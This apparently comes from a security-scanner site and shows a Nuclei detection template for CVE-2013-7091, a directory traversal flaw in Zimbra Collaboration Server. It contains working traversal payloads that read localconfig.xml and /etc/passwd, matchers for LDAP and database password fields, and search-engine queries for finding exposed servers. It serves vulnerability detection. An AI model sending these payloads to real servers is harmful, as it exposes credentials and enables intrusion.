Zimbra Collaboration Server 7.2.2/8.0.2 Local File Inclusion
ID: CVE-2013-7091
Severity: medium
Author: rubina119
Tags: cve2013,cve,packetstorm,zimbra,lfi,edb,synacor
Description
Section titled “Description”A directory traversal vulnerability in /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz in Zimbra 7.2.2 and 8.0.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the skin parameter. This can be leveraged to execute arbitrary code by obtaining LDAP credentials and accessing the service/admin/soap API.
YAML Source
Section titled “YAML Source”id: CVE-2013-7091
info: name: Zimbra Collaboration Server 7.2.2/8.0.2 Local File Inclusion author: rubina119 severity: medium description: A directory traversal vulnerability in /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz in Zimbra 7.2.2 and 8.0.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the skin parameter. This can be leveraged to execute arbitrary code by obtaining LDAP credentials and accessing the service/admin/soap API. impact: | Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, potentially leading to unauthorized access or information disclosure. remediation: | Apply the latest security patches or upgrade to a newer version of Zimbra Collaboration Server to mitigate the LFI vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2013-7091 - https://www.exploit-db.com/exploits/30085 - https://www.exploit-db.com/exploits/30472 - http://www.exploit-db.com/exploits/30085 - http://packetstormsecurity.com/files/124321 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2013-7091 cwe-id: CWE-22 epss-score: 0.97337 epss-percentile: 0.99881 cpe: cpe:2.3:a:synacor:zimbra_collaboration_suite:6.0.0:*:*:*:*:*:*:* metadata: max-request: 2 vendor: synacor product: zimbra_collaboration_suite shodan-query: - http.title:"zimbra collaboration suite" - http.title:"zimbra web client sign in" fofa-query: - title="zimbra web client sign in" - title="zimbra collaboration suite" google-query: - intitle:"zimbra collaboration suite" - intitle:"zimbra web client sign in" tags: cve2013,cve,packetstorm,zimbra,lfi,edb,synacor
http: - method: GET path: - "{{BaseURL}}/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00" - "{{BaseURL}}/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../etc/passwd%00"
stop-at-first-match: true
matchers-condition: or matchers: - type: word words: - "zimbra_server_hostname" - "zimbra_ldap_userdn" - "zimbra_ldap_password" - "ldap_postfix_password" - "ldap_amavis_password" - "ldap_nginx_password" - "mysql_root_password" condition: or
- type: regex regex: - "root:.*:0:0:"# digest: 4a0a00473045022014a462317be3f98808192f3cdb5a07fa245b9d0a178b68ab66164687bf03702b022100a68f39231b8986af315524dfca091c394269654385da99da23a73174e778e63b:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2013/CVE-2013-7091.yaml"